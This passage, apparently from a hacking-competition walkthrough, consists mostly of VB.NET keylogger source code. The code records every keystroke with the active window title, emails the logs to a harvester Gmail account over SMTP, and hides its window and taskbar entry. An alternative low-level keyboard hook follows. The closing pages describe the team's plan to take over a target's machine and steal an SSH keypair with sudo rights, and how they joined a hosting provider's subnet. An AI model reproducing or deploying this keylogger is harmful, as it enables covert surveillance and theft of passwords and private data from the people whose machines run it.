mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.V)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "V"

End If

Page 21: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "v"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.W)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "W"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "w"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.X)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "X"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "x"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Y)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "Y"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "y"

End If

Page 22: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Z)

If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "Z"

End If

If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "z"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "1"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "!"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "2"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "@"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)

Page 23: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "3"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "#"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "4"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "$"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "5"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "%"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

Page 24: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

txtNishikieKeys.Text = txtNishikieKeys.Text & "6"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "^"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "7"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "&"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "8"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "*"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "9"

Page 25: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "("

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "0"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & ")"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf

End If

Page 26: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & " "

End If

Page 27: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)

Page 28: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBAS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & ";"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & ":"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBBS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "="

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "+"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBCS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & ","

End If

Page 29: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "<"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBDS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "-"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "_"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBES)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "."

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & ">"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBFS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "/"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "?"

End If

Page 30: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HC0S)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "`"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "~"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDBS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "["

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "["

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDCS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "\"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "|"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDDS)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "]"

Page 31: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDES)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "'"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "*"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "/"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "+"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)

Page 32: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "-"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

Page 33: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"

Page 34: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12)

If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]"

End If

If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then

Me.Visible = True

Call RegisterServiceProcess(0, 0)

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"

End If

Page 35: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "1"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "2"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "3"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "4"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "5"

End If

Page 36: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "6"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "7"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "8"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "9"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "0"

End If

mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)

If (mimiNiCapsAmaLa And &H1S) = &H1S Then

txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"

End If

‘this ends checking our keys for now

‘next trap active window so that we can record and associate do It in one of your timers preferably with a short time frame.

Page 37: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Private Function GetActiveWindowTitle() As String

Dim kiAppCurrent As String

kiAppCurrent = New String(Chr(0), 100)

GetWindowText(GetForegroundWindow, kiAppCurrent, 100)

kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)

Return kiAppCurrent

End Function

‘in timer 2 we add what we trap to the window we trapped it from

Dim strin As String = Nothing

If strin <> GetActiveWindowTitle() Then

txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine

strin = GetActiveWindowTitle()

End If

Dim MyMailMessage As New MailMessage()

MyMailMessage.From = New MailAddress("[email protected]")

MyMailMessage.To.Add("[email protected]")

MyMailMessage.Subject = "Team 0wnErz "

MyMailMessage.Body = txtNishikieKeys.Text

Dim SMPT As New SmtpClient("smtp.gmail.com")

SMPT.Port = 587

SMPT.EnableSsl = True

SMPT.Credentials = New System.Net.NetworkCredential("[email protected]", "<YouReallyExpectOurHarvesterPasswordToBeGivenHereSorry>")

SMPT.Send(MyMailMessage)

txtNishikieKeys.Text = ""

‘before we forget hide the app lol

Me.hide

Me.opacity = 0

Me.ShowInTaskbar = false

Page 38: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

For those asking why no keyboard hooks and all the initialization well its XP no need for paranoia and noise on a system but here’s something to calm you down if you don’t like the tiresome but innocent method above.

Private KeyboardHookProcedure As Win32.HookProc

Public Sub InstallHooks()

If hKeyboardHook = 0 Then ' install Keyboard hook

KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)

hKeyboardHook = Win32.SetWindowsHookEx( _

Win32.WH.WH_KEYBOARD_LL, _

KeyboardHookProcedure, _

Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _

0)

If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed

RemoveHooks()

Throw New Exception("SetWindowsHookEx failed.")

End If

End If

End Sub

Public Sub RemoveHooks()

Dim keyboardResult As Boolean = True

If hKeyboardHook <> 0 Then

keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)

hKeyboardHook = 0

End If

If Not keyboardResult Then 'UnhookWindowsHookEx failed

Throw New Exception("UnhookWindowsHookEx failed.")

End If

End Sub

Page 39: Hackbattle 2013 Walkthrough (Nasty Salon V2)

Munir Njiru || Ruth Efrain || Ibrahim Gathungu

Ma

rc

h

28

,

20

14

Also on the Hackbattle group they mentioned that VPS was by Azanuru , and we checked them out as we did the keylogger. We need as much as we can get as we plan to own Joan.

So we visit Azanuru site and guess what open test day till 20th. It was running on Openstack had 3 public IP subnets up and running one on the same network as the

VPS running Nasty salon interesting from phpinfo we saw an ubuntu install so we did a 13.10 as is the case on the blog’s tutorial and we join the subnet with the VPS

and get a floating IP of:

197.232.19.197

Azanuru guys notice and send us a mail to join the .20 subnet one and kick our floating IP out but one thing we know is we are using a keypair to login and it has sudo access amazing ☺. So this (keypair) is what we will be targeting from Joan not other credentials.

So kick us out but we know btw just a feel of how the droplet started failing: 2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling

2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]

2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]

2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds

2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from <class 'cloudinit.sources.DataSourceCloudStack.DataSourceCloudStack'> failed

